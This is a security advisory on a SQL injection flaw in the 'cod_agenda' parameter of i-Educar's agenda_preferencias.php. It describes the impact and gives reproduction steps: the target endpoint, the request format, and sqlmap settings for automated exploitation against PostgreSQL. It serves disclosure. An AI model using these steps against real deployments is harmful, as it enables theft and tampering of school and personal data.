Portabilis i-Educar SQL Injection Vulnerability in agenda_preferencias.php

A SQL injection vulnerability has been identified in the Portabilis i-Educar application, affecting versions up to 2.10. The issue arises in the 'agenda_preferencias.php' file, specifically within the 'cod_agenda' parameter. This vulnerability allows remote attackers to manipulate the parameter and execute arbitrary SQL commands on the backend database. The application fails to properly validate and sanitize user input, enabling the injection of crafted SQL payloads that could be exploited for unauthorized data access, database enumeration, data manipulation, denial-of-service attacks using time-based delays, and potentially privilege escalation or remote code execution, depending on the database configuration.

Impact

Exploitation of this vulnerability could lead to unauthorized access to sensitive data, such as credentials and personal information, as well as application configuration details. The vulnerability allows for database enumeration and manipulation, including the insertion, updating, or deletion of records. Additionally, the vulnerability could be exploited to disrupt application availability through denial-of-service attacks, using time-based SQL injection techniques. In some cases, depending on the database functions available and the application context, this vulnerability could lead to privilege escalation or remote code execution.

Reproduction

To reproduce this vulnerability, send a POST request to the 'intranet/agenda_preferencias.php' endpoint. Include the 'cod_agenda' parameter with a value that will trigger the injection. The request should be formatted as 'application/x-www-form-urlencoded'. After sending the request, use a tool like sqlmap to automate the exploitation process. Sqlmap can be instructed to target the 'cod_agenda' parameter, using a risk level of 3 and a verbosity level of 5, while specifying PostgreSQL as the database management system.